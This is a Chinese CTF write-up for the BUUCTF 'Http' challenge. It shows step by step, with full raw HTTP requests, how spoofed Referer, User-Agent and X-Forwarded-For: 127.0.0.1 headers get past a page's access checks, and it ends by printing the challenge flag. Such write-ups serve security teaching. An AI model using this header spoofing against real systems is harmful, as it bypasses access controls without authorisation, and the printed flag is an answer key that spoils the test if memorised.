[极客大挑战]Http
访问url:
http://node3.buuoj.cn:25490/
首页如下:
![【buuctf】[极客大挑战]Http](http://cn-sec.com/wp-content/uploads/2025/04/2-1744719005.png "【buuctf】[极客大挑战]Http")
先查看源代码,找到Secret.php
![【buuctf】[极客大挑战]Http](http://cn-sec.com/wp-content/uploads/2025/04/7-1744719006.png "【buuctf】[极客大挑战]Http")
找到Secret.php文件,进入相应的页面
![【buuctf】[极客大挑战]Http](http://cn-sec.com/wp-content/uploads/2025/04/1-1744719007.png "【buuctf】[极客大挑战]Http")
提示我们需要修改header头,把https://www.Sycsecret.com写进去,复制一个头文件,添加关键的一行
Referer: https://www.Sycsecret.com
请求包如下:
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:25490
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.Sycsecret.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
响应如下:
![【buuctf】[极客大挑战]Http](http://cn-sec.com/wp-content/uploads/2025/04/7-1744719008.png "【buuctf】[极客大挑战]Http")
随后提示我们浏览器需要使用Syclover,向头里面添加一行,也就是修改一下User-Agent的内容
User-Agent: Syclover
请求包如下:
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:25490
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.Sycsecret.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
响应如下:
![【buuctf】[极客大挑战]Http](http://cn-sec.com/wp-content/uploads/2025/04/2-1744719008.png "【buuctf】[极客大挑战]Http")
发现到现在还是没有出来,它说我们只能在本地访问,那么意思就是要我们使用127.0.0.1来访问,那么我们来添加一行
X-Forwarded-For: 127.0.0.1
请求包如下:
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:25490
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.Sycsecret.com
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
得到flag{cb30a0b2-0822-43a2-8964-b55bffa0afe6}
![【buuctf】[极客大挑战]Http](http://cn-sec.com/wp-content/uploads/2025/04/10-1744719009.png "【buuctf】[极客大挑战]Http")
攻防交流群
![【buuctf】[极客大挑战]Http](http://cn-sec.com/wp-content/uploads/2025/04/6-1744719010.png "【buuctf】[极客大挑战]Http")
声明
免责声明:该文章内容仅用于学习交流自查使用,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息、技术或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关,公众号儒道易行及作者不为此承担任何责任。
转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
原文始发于微信公众号(儒道易行):【buuctf】[极客大挑战]Http
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论